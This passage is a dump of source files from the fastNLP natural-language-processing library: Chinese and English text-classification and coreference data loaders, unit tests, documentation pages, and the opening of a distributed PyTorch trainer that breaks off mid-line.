:header: \"raw_chars\", \"chars\", \"target\", \"seq_len\"\n\n \"這間酒店環境和服務態度亦算不錯,但房間空間太小~~\", \"[2, 3, 4, 5, ...]\", 1, 31\n \"<荐书> 推荐所有喜欢<红楼>...\", \"[10, 21, ....]\", 1, 25\n \"...\"\n\n 其中chars, seq_len是input,target是target\n\n \"\"\"\n def __init__(self, bigrams=False, trigrams=False):\n \"\"\"\n \n :param bool bigrams: 是否增加一列bigrams. bigrams的构成是['复', '旦', '大', '学', ...]->[\"复旦\", \"旦大\", ...]。如果\n 设置为True,返回的DataSet将有一列名为bigrams, 且已经转换为了index并设置为input,对应的vocab可以通过\n data_bundle.get_vocab('bigrams')获取.\n :param bool trigrams: 是否增加一列trigrams. trigrams的构成是 ['复', '旦', '大', '学', ...]->[\"复旦大\", \"旦大学\", ...]\n 。如果设置为True,返回的DataSet将有一列名为trigrams, 且已经转换为了index并设置为input,对应的vocab可以通过\n data_bundle.get_vocab('trigrams')获取.\n \"\"\"\n super().__init__()\n\n self.bigrams = bigrams\n self.trigrams = trigrams\n\n def _tokenize(self, data_bundle):\n \"\"\"\n 将DataSet中的\"复旦大学\"拆分为[\"复\", \"旦\", \"大\", \"学\"]. 未来可以通过扩展这个函数实现分词。\n\n :param data_bundle:\n :return:\n \"\"\"\n data_bundle.apply_field(list, field_name=Const.CHAR_INPUT, new_field_name=Const.CHAR_INPUT)\n return data_bundle\n\n def process(self, data_bundle:DataBundle):\n \"\"\"\n 可以处理的DataSet应该具备以下的field\n\n .. 
csv-table::\n :header: \"raw_chars\", \"target\"\n\n \"這間酒店環境和服務態度亦算不錯,但房間空間太小~~\", \"1\"\n \"<荐书> 推荐所有喜欢<红楼>...\", \"1\"\n \"...\"\n\n :param data_bundle:\n :return:\n \"\"\"\n _add_chars_field(data_bundle, lower=False)\n\n data_bundle = self._tokenize(data_bundle)\n\n input_field_names = [Const.CHAR_INPUT]\n if self.bigrams:\n for name, dataset in data_bundle.iter_datasets():\n dataset.apply_field(lambda chars: [c1 + c2 for c1, c2 in zip(chars, chars[1:] + ['<eos>'])],\n field_name=Const.CHAR_INPUT, new_field_name='bigrams')\n input_field_names.append('bigrams')\n if self.trigrams:\n for name, dataset in data_bundle.iter_datasets():\n dataset.apply_field(lambda chars: [c1 + c2 + c3 for c1, c2, c3 in\n zip(chars, chars[1:] + ['<eos>'], chars[2:] + ['<eos>'] * 2)],\n field_name=Const.CHAR_INPUT, new_field_name='trigrams')\n input_field_names.append('trigrams')\n\n # index\n _indexize(data_bundle, input_field_names, Const.TARGET)\n\n input_fields = [Const.TARGET, Const.INPUT_LEN] + input_field_names\n target_fields = [Const.TARGET]\n\n for name, dataset in data_bundle.datasets.items():\n dataset.add_seq_len(Const.CHAR_INPUT)\n\n data_bundle.set_input(*input_fields)\n data_bundle.set_target(*target_fields)\n\n return data_bundle\n\n def process_from_file(self, paths=None):\n \"\"\"\n\n :param paths: 支持路径类型参见 :class:`fastNLP.io.loader.Loader` 的load函数。\n :return: DataBundle\n \"\"\"\n # 读取数据\n data_bundle = ChnSentiCorpLoader().load(paths)\n data_bundle = self.process(data_bundle)\n\n return data_bundle" }, { "alpha_fraction": 0.5406790375709534, "alphanum_fraction": 0.5579756498336792, "avg_line_length": 30.219999313354492, "blob_id": "fb44a64c4616765051d6e3bf88428bce66cce34f", "content_id": "4293f65ac37a1af0948ec6905be76e4cdc192f15", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1739, "license_type": "permissive", "max_line_length": 117, "num_lines": 50, "path": "/fastNLP/io/loader/coreference.py", "repo_name": "brxx122/fastNLP", "src_encoding": "UTF-8", "text": "\"\"\"undocumented\"\"\"\n\n__all__ = [\n \"CoReferenceLoader\",\n]\n\nfrom ...core.dataset import DataSet\nfrom ..file_reader import _read_json\nfrom ...core.instance import Instance\nfrom ...core.const import Const\nfrom .json import JsonLoader\n\n\nclass CoReferenceLoader(JsonLoader):\n \"\"\"\n 原始数据中内容应该为, 每一行为一个json对象,其中doc_key包含文章的种类信息,speakers包含每句话的说话者信息,cluster是指向现实中同一个事物的聚集,sentences是文本信息内容。\n\n Example::\n\n {\"doc_key\":\"bc/cctv/00/cctv_001\",\n \"speakers\":\"[[\"Speaker1\",\"Speaker1\",\"Speaker1\"],[\"Speaker1\",\"Speaker1\",\"Speaker1\"]]\",\n \"clusters\":\"[[[2,3],[4,5]],[7,8],[18,20]]]\",\n \"sentences\":[[\"I\",\"have\",\"an\",\"apple\"],[\"It\",\"is\",\"good\"]]\n }\n\n 读取预处理好的Conll2012数据。\n\n \"\"\"\n def __init__(self, fields=None, dropna=False):\n super().__init__(fields, dropna)\n # self.fields = {\"doc_key\":Const.INPUTS(0),\"speakers\":Const.INPUTS(1),\n # \"clusters\":Const.TARGET,\"sentences\":Const.INPUTS(2)}\n self.fields = {\"doc_key\": Const.RAW_WORDS(0), \"speakers\": Const.RAW_WORDS(1), \"clusters\": Const.RAW_WORDS(2),\n \"sentences\": Const.RAW_WORDS(3)}\n\n def _load(self, path):\n \"\"\"\n 加载数据\n :param path: 数据文件路径,文件为json\n\n :return:\n \"\"\"\n dataset = DataSet()\n for idx, d in _read_json(path, fields=self.fields_list, dropna=self.dropna):\n if self.fields:\n ins = {self.fields[k]: v for k, v in d.items()}\n else:\n ins = d\n dataset.append(Instance(**ins))\n return dataset\n" }, { "alpha_fraction": 
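The bigram/trigram columns built in ChnSentiCorpPipe.process above come from zipping the character list against shifted, '<eos>'-padded copies of itself. A worked example of exactly that construction::

    chars = ['复', '旦', '大', '学']
    bigrams = [c1 + c2 for c1, c2 in zip(chars, chars[1:] + ['<eos>'])]
    trigrams = [c1 + c2 + c3 for c1, c2, c3 in
                zip(chars, chars[1:] + ['<eos>'], chars[2:] + ['<eos>'] * 2)]
    print(bigrams)   # ['复旦', '旦大', '大学', '学<eos>']
    print(trigrams)  # ['复旦大', '旦大学', '大学<eos>', '学<eos><eos>']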
0.49556246399879456, "alphanum_fraction": 0.5070924758911133, "avg_line_length": 32.12311553955078, "blob_id": "99649ce13db131a99667df920035f05d7a05b0ab", "content_id": "ac1bba223cefd0717afbffad2b5392ecb323c1f1", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14865, "license_type": "permissive", "max_line_length": 110, "num_lines": 398, "path": "/fastNLP/io/loader/classification.py", "repo_name": "brxx122/fastNLP", "src_encoding": "UTF-8", "text": "\"\"\"undocumented\"\"\"\n\n__all__ = [\n \"YelpLoader\",\n \"YelpFullLoader\",\n \"YelpPolarityLoader\",\n \"IMDBLoader\",\n \"SSTLoader\",\n \"SST2Loader\",\n \"ChnSentiCorpLoader\"\n]\n\nimport glob\nimport os\nimport random\nimport shutil\nimport time\nimport warnings\n\nfrom .loader import Loader\nfrom ...core.dataset import DataSet\nfrom ...core.instance import Instance\n\n\nclass YelpLoader(Loader):\n \"\"\"\n 原始数据中内容应该为, 每一行为一个sample,第一个逗号之前为target,第一个逗号之后为文本内容。\n\n Example::\n \n \"1\",\"I got 'new' tires from the...\"\n \"1\",\"Don't waste your time...\"\n\n 读取的DataSet将具备以下的数据结构\n\n .. csv-table::\n :header: \"raw_words\", \"target\"\n\n \"I got 'new' tires from them and... \", \"1\"\n \"Don't waste your time. We had two...\", \"1\"\n \"...\", \"...\"\n\n \"\"\"\n \n def __init__(self):\n super(YelpLoader, self).__init__()\n \n def _load(self, path: str = None):\n ds = DataSet()\n with open(path, 'r', encoding='utf-8') as f:\n for line in f:\n line = line.strip()\n sep_index = line.index(',')\n target = line[:sep_index]\n raw_words = line[sep_index + 1:]\n if target.startswith(\"\\\"\"):\n target = target[1:]\n if target.endswith(\"\\\"\"):\n target = target[:-1]\n if raw_words.endswith(\"\\\"\"):\n raw_words = raw_words[:-1]\n if raw_words.startswith('\"'):\n raw_words = raw_words[1:]\n raw_words = raw_words.replace('\"\"', '\"') # 替换双引号\n if raw_words:\n ds.append(Instance(raw_words=raw_words, target=target))\n return ds\n\n\nclass YelpFullLoader(YelpLoader):\n def download(self, dev_ratio: float = 0.1, re_download: bool = False):\n \"\"\"\n 自动下载数据集,如果你使用了这个数据集,请引用以下的文章\n\n Xiang Zhang, Junbo Zhao, Yann LeCun. Character-level Convolutional Networks for Text Classification. Advances\n in Neural Information Processing Systems 28 (NIPS 2015)\n\n 根据dev_ratio的值随机将train中的数据取出一部分作为dev数据。下载完成后在output_dir中有train.csv, test.csv,\n dev.csv三个文件。\n\n :param float dev_ratio: 如果路径中没有dev集,从train划分多少作为dev的数据. 
如果为0,则不划分dev。\n :param bool re_download: 是否重新下载数据,以重新切分数据。\n :return: str, 数据集的目录地址\n \"\"\"\n \n dataset_name = 'yelp-review-full'\n data_dir = self._get_dataset_path(dataset_name=dataset_name)\n modify_time = 0\n for filepath in glob.glob(os.path.join(data_dir, '*')):\n modify_time = os.stat(filepath).st_mtime\n break\n if time.time() - modify_time > 1 and re_download: # 通过这种比较丑陋的方式判断一下文件是否是才下载的\n shutil.rmtree(data_dir)\n data_dir = self._get_dataset_path(dataset_name=dataset_name)\n \n if not os.path.exists(os.path.join(data_dir, 'dev.csv')):\n if dev_ratio > 0:\n assert 0 < dev_ratio < 1, \"dev_ratio should be in range (0,1).\"\n try:\n with open(os.path.join(data_dir, 'train.csv'), 'r', encoding='utf-8') as f, \\\n open(os.path.join(data_dir, 'middle_file.csv'), 'w', encoding='utf-8') as f1, \\\n open(os.path.join(data_dir, 'dev.csv'), 'w', encoding='utf-8') as f2:\n for line in f:\n if random.random() < dev_ratio:\n f2.write(line)\n else:\n f1.write(line)\n os.remove(os.path.join(data_dir, 'train.csv'))\n os.renames(os.path.join(data_dir, 'middle_file.csv'), os.path.join(data_dir, 'train.csv'))\n finally:\n if os.path.exists(os.path.join(data_dir, 'middle_file.csv')):\n os.remove(os.path.join(data_dir, 'middle_file.csv'))\n \n return data_dir\n\n\nclass YelpPolarityLoader(YelpLoader):\n def download(self, dev_ratio: float = 0.1, re_download=False):\n \"\"\"\n 自动下载数据集,如果你使用了这个数据集,请引用以下的文章\n\n Xiang Zhang, Junbo Zhao, Yann LeCun. Character-level Convolutional Networks for Text Classification. Advances\n in Neural Information Processing Systems 28 (NIPS 2015)\n\n 根据dev_ratio的值随机将train中的数据取出一部分作为dev数据。下载完成后从train中切分dev_ratio这么多作为dev\n\n :param float dev_ratio: 如果路径中不存在dev.csv, 从train划分多少作为dev的数据。 如果为0,则不划分dev。\n :param bool re_download: 是否重新下载数据,以重新切分数据。\n :return: str, 数据集的目录地址\n \"\"\"\n dataset_name = 'yelp-review-polarity'\n data_dir = self._get_dataset_path(dataset_name=dataset_name)\n modify_time = 0\n for filepath in glob.glob(os.path.join(data_dir, '*')):\n modify_time = os.stat(filepath).st_mtime\n break\n if time.time() - modify_time > 1 and re_download: # 通过这种比较丑陋的方式判断一下文件是否是才下载的\n shutil.rmtree(data_dir)\n data_dir = self._get_dataset_path(dataset_name=dataset_name)\n \n if not os.path.exists(os.path.join(data_dir, 'dev.csv')):\n if dev_ratio > 0:\n assert 0 < dev_ratio < 1, \"dev_ratio should be in range (0,1).\"\n try:\n with open(os.path.join(data_dir, 'train.csv'), 'r', encoding='utf-8') as f, \\\n open(os.path.join(data_dir, 'middle_file.csv'), 'w', encoding='utf-8') as f1, \\\n open(os.path.join(data_dir, 'dev.csv'), 'w', encoding='utf-8') as f2:\n for line in f:\n if random.random() < dev_ratio:\n f2.write(line)\n else:\n f1.write(line)\n os.remove(os.path.join(data_dir, 'train.csv'))\n os.renames(os.path.join(data_dir, 'middle_file.csv'), os.path.join(data_dir, 'train.csv'))\n finally:\n if os.path.exists(os.path.join(data_dir, 'middle_file.csv')):\n os.remove(os.path.join(data_dir, 'middle_file.csv'))\n \n return data_dir\n\n\nclass IMDBLoader(Loader):\n \"\"\"\n IMDBLoader读取后的数据将具有以下两列内容: raw_words: str, 需要分类的文本; target: str, 文本的标签\n DataSet具备以下的结构:\n\n .. csv-table::\n :header: \"raw_words\", \"target\"\n\n \"Bromwell High is a cartoon ... 
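The download() methods above all share the same randomized split: each train line lands in dev with probability dev_ratio. A self-contained sketch of that logic (the seeding is an addition here; the loaders above do not seed)::

    import random

    def split_dev(lines, dev_ratio=0.1, seed=0):
        random.seed(seed)
        train, dev = [], []
        for line in lines:
            (dev if random.random() < dev_ratio else train).append(line)
        return train, dev

    train, dev = split_dev([f"sample {i}" for i in range(100)])
    print(len(train), len(dev))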
\", \"pos\"\n \"Story of a man who has ...\", \"neg\"\n \"...\", \"...\"\n\n \"\"\"\n \n def __init__(self):\n super(IMDBLoader, self).__init__()\n \n def _load(self, path: str):\n dataset = DataSet()\n with open(path, 'r', encoding=\"utf-8\") as f:\n for line in f:\n line = line.strip()\n if not line:\n continue\n parts = line.split('\\t')\n target = parts[0]\n words = parts[1]\n if words:\n dataset.append(Instance(raw_words=words, target=target))\n \n if len(dataset) == 0:\n raise RuntimeError(f\"{path} has no valid data.\")\n \n return dataset\n \n def download(self, dev_ratio: float = 0.1, re_download=False):\n \"\"\"\n 自动下载数据集,如果你使用了这个数据集,请引用以下的文章\n\n http://www.aclweb.org/anthology/P11-1015\n\n 根据dev_ratio的值随机将train中的数据取出一部分作为dev数据。下载完成后从train中切分0.1作为dev\n\n :param float dev_ratio: 如果路径中没有dev.txt。从train划分多少作为dev的数据. 如果为0,则不划分dev\n :param bool re_download: 是否重新下载数据,以重新切分数据。\n :return: str, 数据集的目录地址\n \"\"\"\n dataset_name = 'aclImdb'\n data_dir = self._get_dataset_path(dataset_name=dataset_name)\n modify_time = 0\n for filepath in glob.glob(os.path.join(data_dir, '*')):\n modify_time = os.stat(filepath).st_mtime\n break\n if time.time() - modify_time > 1 and re_download: # 通过这种比较丑陋的方式判断一下文件是否是才下载的\n shutil.rmtree(data_dir)\n data_dir = self._get_dataset_path(dataset_name=dataset_name)\n \n if not os.path.exists(os.path.join(data_dir, 'dev.csv')):\n if dev_ratio > 0:\n assert 0 < dev_ratio < 1, \"dev_ratio should be in range (0,1).\"\n try:\n with open(os.path.join(data_dir, 'train.txt'), 'r', encoding='utf-8') as f, \\\n open(os.path.join(data_dir, 'middle_file.txt'), 'w', encoding='utf-8') as f1, \\\n open(os.path.join(data_dir, 'dev.txt'), 'w', encoding='utf-8') as f2:\n for line in f:\n if random.random() < dev_ratio:\n f2.write(line)\n else:\n f1.write(line)\n os.remove(os.path.join(data_dir, 'train.txt'))\n os.renames(os.path.join(data_dir, 'middle_file.txt'), os.path.join(data_dir, 'train.txt'))\n finally:\n if os.path.exists(os.path.join(data_dir, 'middle_file.txt')):\n os.remove(os.path.join(data_dir, 'middle_file.txt'))\n \n return data_dir\n\n\nclass SSTLoader(Loader):\n \"\"\"\n 读取之后的DataSet具有以下的结构\n\n .. csv-table:: 下面是使用SSTLoader读取的DataSet所具备的field\n :header: \"raw_words\"\n\n \"(3 (2 It) (4 (4 (2 's) (4 (3 (2 a)...\"\n \"(4 (4 (2 Offers) (3 (3 (2 that) (3 (3 rare)...\"\n \"...\"\n\n raw_words列是str。\n\n \"\"\"\n \n def __init__(self):\n super().__init__()\n \n def _load(self, path: str):\n \"\"\"\n 从path读取SST文件\n\n :param str path: 文件路径\n :return: DataSet\n \"\"\"\n ds = DataSet()\n with open(path, 'r', encoding='utf-8') as f:\n for line in f:\n line = line.strip()\n if line:\n ds.append(Instance(raw_words=line))\n return ds\n \n def download(self):\n \"\"\"\n 自动下载数据集,如果你使用了这个数据集,请引用以下的文章\n\n https://nlp.stanford.edu/~socherr/EMNLP2013_RNTN.pdf\n\n :return: str, 数据集的目录地址\n \"\"\"\n output_dir = self._get_dataset_path(dataset_name='sst')\n return output_dir\n\n\nclass SST2Loader(Loader):\n \"\"\"\n 数据SST2的Loader\n 读取之后DataSet将如下所示\n\n .. 
csv-table::\n        :header: \"raw_words\", \"target\"\n\n        \"it 's a charming and often affecting...\", \"1\"\n        \"unflinchingly bleak and...\", \"0\"\n        \"...\"\n\n    test的DataSet没有target列。\n    \"\"\"\n    \n    def __init__(self):\n        super().__init__()\n    \n    def _load(self, path: str):\n        \"\"\"\n        从path读取SST2文件\n\n        :param str path: 数据路径\n        :return: DataSet\n        \"\"\"\n        ds = DataSet()\n        \n        with open(path, 'r', encoding='utf-8') as f:\n            f.readline()  # 跳过header\n            if 'test' in os.path.split(path)[1]:\n                warnings.warn(\"SST2's test file has no target.\")\n                for line in f:\n                    line = line.strip()\n                    if line:\n                        sep_index = line.index('\\t')\n                        raw_words = line[sep_index + 1:]\n                        if raw_words:\n                            ds.append(Instance(raw_words=raw_words))\n            else:\n                for line in f:\n                    line = line.strip()\n                    if line:\n                        raw_words = line[:-2]\n                        target = line[-1]\n                        if raw_words:\n                            ds.append(Instance(raw_words=raw_words, target=target))\n        return ds\n    \n    def download(self):\n        \"\"\"\n        自动下载数据集,如果你使用了该数据集,请引用以下的文章\n\n        https://nlp.stanford.edu/pubs/SocherBauerManningNg_ACL2013.pdf\n\n        :return:\n        \"\"\"\n        output_dir = self._get_dataset_path(dataset_name='sst-2')\n        return output_dir\n\n\nclass ChnSentiCorpLoader(Loader):\n    \"\"\"\n    支持读取的数据的格式为,第一行为标题(具体内容会被忽略),之后一行为一个sample,第一个制表符之前被认为是label,第\n    一个制表符之后认为是句子\n\n    Example::\n\n        label\traw_chars\n        1\t這間酒店環境和服務態度亦算不錯,但房間空間太小~~\n        1\t<荐书> 推荐所有喜欢<红楼>的红迷们一定要收藏这本书,要知道...\n        0\t商品的不足暂时还没发现,京东的订单处理速度实在.......周二就打包完成,周五才发货...\n\n    读取后的DataSet具有以下的field\n\n    .. csv-table::\n        :header: \"raw_chars\", \"target\"\n\n        \"這間酒店環境和服務態度亦算不錯,但房間空間太小~~\", \"1\"\n        \"<荐书> 推荐所有喜欢<红楼>...\", \"1\"\n        \"...\"\n\n    \"\"\"\n    def __init__(self):\n        super().__init__()\n\n    def _load(self, path: str):\n        \"\"\"\n        从path中读取数据\n\n        :param path:\n        :return:\n        \"\"\"\n        ds = DataSet()\n        with open(path, 'r', encoding='utf-8') as f:\n            f.readline()\n            for line in f:\n                line = line.strip()\n                tab_index = line.find('\\t')\n                if tab_index != -1:\n                    target = line[:tab_index]\n                    raw_chars = line[tab_index+1:]\n                    if raw_chars:\n                        ds.append(Instance(raw_chars=raw_chars, target=target))\n        return ds\n\n    def download(self)->str:\n        \"\"\"\n        自动下载数据,该数据取自https://github.com/pengming617/bert_classification/tree/master/data,在\n        https://arxiv.org/pdf/1904.09223.pdf与https://arxiv.org/pdf/1906.08101.pdf有使用\n\n        :return:\n        \"\"\"\n        output_dir = self._get_dataset_path('chn-senti-corp')\n        return output_dir\n" }, { "alpha_fraction": 0.6086474657058716, "alphanum_fraction": 0.6164079904556274, "avg_line_length": 39.0444450378418, "blob_id": "9aa9e289e9647f4dbdae7e132667d8649a847548", "content_id": "8d6e182cc8bcbfed1522eaaf3ddf0f9ba67caf6c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1804, "license_type": "permissive", "max_line_length": 87, "num_lines": 45, "path": "/test/io/loader/test_matching_loader.py", "repo_name": "brxx122/fastNLP", "src_encoding": "UTF-8", "text": "\nimport unittest\n\nfrom fastNLP.io import DataBundle\nfrom fastNLP.io.loader.matching import RTELoader\nfrom fastNLP.io.loader.matching import QNLILoader\nfrom fastNLP.io.loader.matching import SNLILoader\nfrom fastNLP.io.loader.matching import QuoraLoader\nfrom fastNLP.io.loader.matching import MNLILoader\nimport os\n\[email protected]('TRAVIS' in os.environ, \"Skip in travis\")\nclass TestMatchingDownload(unittest.TestCase):\n    def test_download(self):\n        for loader in [RTELoader, QNLILoader, SNLILoader, MNLILoader]:\n            loader().download()\n        with self.assertRaises(Exception):\n            QuoraLoader().load()\n\n    def test_load(self):\n        for loader in [RTELoader, 
QNLILoader, SNLILoader, MNLILoader]:\n data_bundle = loader().load()\n print(data_bundle)\n\n\nclass TestMatchingLoad(unittest.TestCase):\n def test_load(self):\n data_set_dict = {\n 'RTE': ('test/data_for_tests/io/RTE', RTELoader, (5, 5, 5), True),\n 'SNLI': ('test/data_for_tests/io/SNLI', SNLILoader, (5, 5, 5), False),\n 'QNLI': ('test/data_for_tests/io/QNLI', QNLILoader, (5, 5, 5), True),\n 'MNLI': ('test/data_for_tests/io/MNLI', MNLILoader, (5, 5, 5, 5, 6), True),\n }\n for k, v in data_set_dict.items():\n path, loader, instance, warns = v\n if warns:\n with self.assertWarns(Warning):\n data_bundle = loader().load(path)\n else:\n data_bundle = loader().load(path)\n\n self.assertTrue(isinstance(data_bundle, DataBundle))\n self.assertEqual(len(instance), data_bundle.num_dataset)\n for x, y in zip(instance, data_bundle.iter_datasets()):\n name, dataset = y\n self.assertEqual(x, len(dataset))\n\n" }, { "alpha_fraction": 0.738095223903656, "alphanum_fraction": 0.7547619342803955, "avg_line_length": 40.95000076293945, "blob_id": "51050d41472aad03eecf9f6b92497d73ad1bdf8f", "content_id": "e19f252bd68cd679218227d2c4f36a79809bf11e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1230, "license_type": "permissive", "max_line_length": 78, "num_lines": 20, "path": "/docs/source/user/tutorials.rst", "repo_name": "brxx122/fastNLP", "src_encoding": "UTF-8", "text": "========================\nfastNLP 详细使用教程\n========================\n\n这里是更详细的使用教程。对于大部分的用户,我们建议你从第一篇开始顺序阅读;如果你只想了解其中的一部分,也可以进行选读。\n\n.. toctree::\n :maxdepth: 1\n\n 使用DataSet预处理文本 </tutorials/tutorial_1_data_preprocess>\n 使用Vocabulary转换文本与index </tutorials/tutorial_2_vocabulary>\n 使用Embedding模块将文本转成向量 </tutorials/tutorial_3_embedding>\n 使用Loader和Pipe加载并处理数据集 </tutorials/tutorial_4_load_dataset>\n 动手实现一个文本分类器II-使用DataSetIter实现自定义训练过程 </tutorials/tutorial_5_datasetiter>\n 动手实现一个文本分类器I-使用Trainer和Tester快速训练和测试 </tutorials/tutorial_6_loss_optimizer>\n 使用Metric快速评测你的模型 </tutorials/tutorial_7_metrics>\n 使用Modules和Models快速搭建自定义模型 </tutorials/tutorial_8_modules_models>\n 快速实现序列标注模型 </tutorials/tutorial_9_seq_labeling>\n 使用Callback自定义你的训练过程 </tutorials/tutorial_10_callback>\n 使用fitlog 辅助 fastNLP 进行科研 </tutorials/tutorial_11_fitlog>\n\n" }, { "alpha_fraction": 0.6178608536720276, "alphanum_fraction": 0.642782986164093, "avg_line_length": 39.125, "blob_id": "3468aad561c0648ae170d5c02697ec1963724501", "content_id": "4ecd79693f7f9b2941d0ec4db650db2f2e8a8d35", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 963, "license_type": "permissive", "max_line_length": 100, "num_lines": 24, "path": "/test/io/pipe/test_conll.py", "repo_name": "brxx122/fastNLP", "src_encoding": "UTF-8", "text": "import unittest\nimport os\nfrom fastNLP.io import MsraNERPipe, PeopleDailyPipe, WeiboNERPipe, Conll2003Pipe, Conll2003NERPipe\n\n\[email protected]('TRAVIS' in os.environ, \"Skip in travis\")\nclass TestConllPipe(unittest.TestCase):\n def test_process_from_file(self):\n for pipe in [MsraNERPipe, PeopleDailyPipe, WeiboNERPipe]:\n with self.subTest(pipe=pipe):\n print(pipe)\n data_bundle = pipe(bigrams=True, trigrams=True).process_from_file()\n print(data_bundle)\n data_bundle = pipe(encoding_type='bioes').process_from_file()\n print(data_bundle)\n\n\nclass TestRunPipe(unittest.TestCase):\n def test_conll2003(self):\n for pipe in [Conll2003Pipe, Conll2003NERPipe]:\n with self.subTest(pipe=pipe):\n print(pipe)\n data_bundle 
= pipe().process_from_file('test/data_for_tests/conll_2003_example.txt')\n                print(data_bundle)\n" }, { "alpha_fraction": 0.773542582988739, "alphanum_fraction": 0.7937219738960266, "avg_line_length": 73.16666412353516, "blob_id": "eca219b30d17a675b43a65981f487e8c3e1fd4d1", "content_id": "c1af6c0c1679527c72673f27f16f20ef47056baf", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 446, "license_type": "permissive", "max_line_length": 350, "num_lines": 6, "path": "/docs/source/fastNLP.io.loader.rst", "repo_name": "brxx122/fastNLP", "src_encoding": "UTF-8", "text": "fastNLP.io.loader\n=================\n\n.. automodule:: fastNLP.io.loader\n   :members: Loader, YelpLoader, YelpFullLoader, YelpPolarityLoader, IMDBLoader, SSTLoader, SST2Loader, ChnSentiCorpLoader, ConllLoader, Conll2003Loader, Conll2003NERLoader, OntoNotesNERLoader, CTBLoader, MsraNERLoader, PeopleDailyNERLoader, WeiboNERLoader, CSVLoader, JsonLoader, CWSLoader, MNLILoader, QuoraLoader, SNLILoader, QNLILoader, RTELoader\n   :inherited-members:\n\n" }, { "alpha_fraction": 0.5666304826736450, "alphanum_fraction": 0.5719228982925415, "avg_line_length": 40.63486862182617, "blob_id": "26080e20987d8decc2c92e34bdd0e52baf3e2b9b", "content_id": "3a2934475ee3fcb3defcaf9d626586732686bc12", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14764, "license_type": "permissive", "max_line_length": 124, "num_lines": 356, "path": "/fastNLP/core/dist_trainer.py", "repo_name": "brxx122/fastNLP", "src_encoding": "UTF-8", "text": "\"\"\"undocumented\nDistributed training code, still under development\n\"\"\"\nimport logging\nimport os\nimport time\nfrom datetime import datetime\n\nimport torch\nimport torch.cuda\nimport torch.distributed as dist\nimport torch.optim\nfrom pkg_resources import parse_version\nfrom torch.nn.parallel import DistributedDataParallel as DDP\nfrom torch.utils.data.distributed import DistributedSampler\nfrom tqdm import tqdm\n\nfrom ._logger import logger\nfrom .batch import DataSetIter, BatchIter\nfrom .callback import DistCallbackManager, CallbackException, TesterCallback\nfrom .dataset import DataSet\nfrom .losses import _prepare_losser\nfrom .optimizer import Optimizer\nfrom .utils import _build_args\nfrom .utils import _get_func_signature\nfrom .utils import _move_dict_value_to_device\n\n__all__ = [\n    'get_local_rank',\n    'DistTrainer',\n]\n\n\ndef get_local_rank():\n    if 'LOCAL_RANK' in os.environ:\n        return int(os.environ['LOCAL_RANK'])\n    from argparse import ArgumentParser\n    parser = ArgumentParser()\n    parser.add_argument('--local_rank', type=int)\n    args, _ = parser.parse_known_args()\n    if 'local_rank' in args and args.local_rank:\n        os.environ['LOCAL_RANK'] = str(args.local_rank)  # for multiple calls for this function\n        return args.local_rank\n    raise RuntimeError('Please use \"python -m torch.distributed.launch --nproc_per_node=N train_script.py\"')\n\n\nclass DistTrainer():\n    \"\"\"\n    Distributed Trainer that supports distributed and mixed precision training\n    \"\"\"\n    def __init__(self, train_data, model, optimizer=None, loss=None,\n                 callbacks_all=None, callbacks_master=None,\n                 batch_size_per_gpu=8, n_epochs=1,\n                 num_workers=1, drop_last=False,\n                 dev_data=None, metrics=None, metric_key=None,\n                 update_every=1, print_every=10, validate_every=-1,\n                 save_every=-1, save_path=None, device='auto',\n                 fp16='', backend=None, init_method=None):\n\n        assert device in ['auto', 'cuda', 'cpu'], \"Please set correct device in ['auto', 
'cuda', 'cpu']\"\n if device == 'auto':\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n if backend is None:\n backend = 'nccl' if device == 'cuda' else 'gloo'\n\n # init distributed\n if device == 'cuda':\n torch.cuda.set_device(get_local_rank())\n self.device = torch.device(\"cuda\", get_local_rank())\n else:\n self.device = torch.device(device)\n\n dist.init_process_group(backend=backend, init_method=init_method)\n self.world_size = dist.get_world_size()\n self.rank = dist.get_rank() # unique id for each process\n\n self.model = model\n self.train_data = train_data\n self.batch_size_per_gpu = int(batch_size_per_gpu)\n self.n_epochs = int(n_epochs)\n self.num_data_workers = int(num_workers)\n self.drop_last = drop_last\n self.update_every = int(update_every)\n self.print_every = int(print_every)\n self.validate_every = int(validate_every)\n self.save_every = int(save_every)\n self.save_path = save_path\n self.losser = _prepare_losser(loss)\n self.fp16 = fp16\n self.init_method = init_method\n self.backend = backend\n self.local_rank = get_local_rank()\n self._forward_func = model.forward\n self.callback_manager = DistCallbackManager(\n env={\"trainer\": self}, callbacks_all=callbacks_all,\n callbacks_master=callbacks_master)\n self.metric_key = metric_key\n\n model.to(self.device)\n optimizer = self._get_optimizer(optimizer)\n\n # init fp16, must before DataParallel init\n if len(self.fp16):\n assert isinstance(self.fp16, str), \"Please set Apex AMP optimization level selected in ['O0', 'O1', 'O2', 'O3']\"\n try:\n from apex import amp\n except ImportError:\n raise ImportError(\"Please install apex from https://www.github.com/nvidia/apex to use fp16 training.\")\n assert torch.backends.cudnn.enabled, \"Amp requires cudnn backend to be enabled.\"\n assert device == 'cuda', \"Amp requires cuda device\"\n model, optimizer = amp.initialize(model, optimizer, opt_level=self.fp16)\n\n # init DataParallel\n if parse_version(torch.__version__)>=parse_version('1.1'):\n self.model = DDP(model, device_ids=[self.local_rank],\n output_device=self.local_rank, find_unused_parameters=True)\n else:\n self.model = DDP(model, device_ids=[self.local_rank],\n output_device=self.local_rank)\n\n self.optimizer = optimizer\n self.sampler = DistributedSampler(self.train_data)\n self.data_iterator = self._get_data_iter(self.train_data)\n self.n_steps = self._get_n_steps()\n\n # for evaluation, only run eval on master proc\n if dev_data and metrics:\n cb = TesterCallback(\n dev_data, model, metrics,\n batch_size=batch_size_per_gpu, num_workers=num_workers)\n self.callback_manager.add_callback([cb], master=True)\n\n # Setup logging\n dist.barrier()\n self.start_time = datetime.now().strftime('%m_%d_%Y-%H_%M')\n if self.save_path:\n self.cp_save_path = os.path.join(self.save_path, 'checkpoints', self.start_time)\n else:\n 